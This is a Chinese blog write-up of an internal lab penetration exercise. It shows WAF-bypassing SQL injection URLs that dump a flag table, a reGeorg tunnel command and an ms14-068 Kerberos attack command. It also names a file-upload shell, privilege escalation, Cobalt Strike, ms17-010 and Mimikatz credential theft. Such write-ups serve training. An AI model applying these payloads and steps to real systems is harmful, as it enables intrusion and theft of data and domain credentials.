一次内部练习

去年年中,部门弄了一次比较有意思的小比赛,难度不大,主要是普及一些内网的知识。

0x01 入口

web1:

http://172.16.8.8

web2:

http://172.16.8.8:82

0x02 SQL注入

两个入口都能进到内网,web1主要是找exp,环境是linux+discuz6.0,能用的漏洞很多,但是我当时没利用成功,就不写了,影响不大。

web2是一个商城系统,加单引号报错了,说明可能存在注入

1
http://172.16.8.8/product.php?id=12' and ''='

安全狗,此地无银三百两,估计就是考绕狗注入了,难度不大,直接发payload了

1
http://172.16.8.8/product.php?id=12'/*%!AA*/order/*%!AA*/by/*%!AA*/1 -- -

1
http://172.16.8.8/product.php?id=12'/*%!AA*/order/*%!AA*/by/*%!AA*/7 -- -

1
http://172.16.8.8/product.php?id=12'/*%!AA*/order/*%!AA*/by/*%!AA*/6 -- -

字段数是6

当前数据库

1
http://172.16.8.8/product.php?id=12'/*%!AA*/union/*%!AA*/select/*%!AA*/1,database/*%!AA*/(),3,4,5,6 -- -

查表,将数据库名转换成16进制:

1
http://172.16.8.8/product.php?id=12'/*%!AA*/union/*%!AA*/select/*%!AA*/1,table_name,3,4,5,6/*c'*/from/*c'*/information_schema.tables/*%!AA*/where/*%!AA*/table_schema=0x736D61727473686F70-- -

提示中flag在数据库里面,通过limit查其他的表:

1
http://172.16.8.8/product.php?id=12'/*%!AA*/union/*%!AA*/select/*%!AA*/1,table_name,3,4,5,6/*c'*/from/*c'*/information_schema.tables/*%!AA*/where/*%!AA*/table_schema=0x736D61727473686F70 limit 0,6-- -

爆字段:

1
http://172.16.8.8/product.php?id=12'/*%!AA*/union/*%!AA*/select/*%!AA*/1,group_concat(column_name),3,4,5,6/*c'*/from/*c'*/information_schema.columns/*%!AA*/where/*%!AA*/table_name=0x666C6167 -- -

爆数据:

1
http://172.16.8.8/product.php?id=12'/*%!AA*/union/*%!AA*/select/*%!AA*/1,flag,3,4,5,6/*c'*/from/*c'*/flag -- -

后面发现,有phpmyadmin(当时没想到要扫服务,毕竟VMware vSphere性能有限,如果都做扫描的话,网站可能会承受不住),可以登录写shell。

0x03 另一个入口

扫描端口,发现还有8080端口

nmap -F -sV -Pn 172.16.8.8

点击重新登录:

没有验证码,弱口令爆破:

系统公告

0x04 getshell

采购入库任意文件上传:

上传shell

返回上一级目录:

0x05 提权

查看当前权限:

提示说在桌面可能还有flag,但是当前权限无法访问桌面,所有需要提权

使用ms16-032进行提权:

使用cobaltstrike进行上线:

查找桌面的flag:

0x06 进入内网

对内网进行探测,发现存在另一个网段:192.168.10.0/24

使用regeorg代理,扫描后发现存在ms17010漏洞(其实这个不是考点,出题人打了补丁忘记重启了,嘿嘿,如果不用ms17010就要转发访问内网服务器的web进行渗透):

1
python regeorg.py -u "http://172.16.8.8:8080/Images/tunnel.ashx"

使用exp反弹shell回来

创建用户,通过cobaltstrike进行连接:

使用Mimikatz抓密码:

查看桌面flag

还有另一台PC2

PC1与PC2存在通用账户admin

使用通用密码进行登录:

ifconfig /all 发现dns是192.168.100.10,推测是域控,从端口也可以推断出是域控(开放了88、389、53等端口)。

查询GPP密码,发现不存在历史密码。

使用ms14068进行攻击,上传ms14068.exe

1
ms14-068.exe -u test2@aclab.com -s S-1-5-21-4073582663-3176860511-3241980539-1103 -d 192.168.100.10 -p Test123/com

使用Mimikatz进行注入:

这样就获取了域控的权限

Author: rootrain
Link: https://rootrain.me/2019/05/21/一次内部练习/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.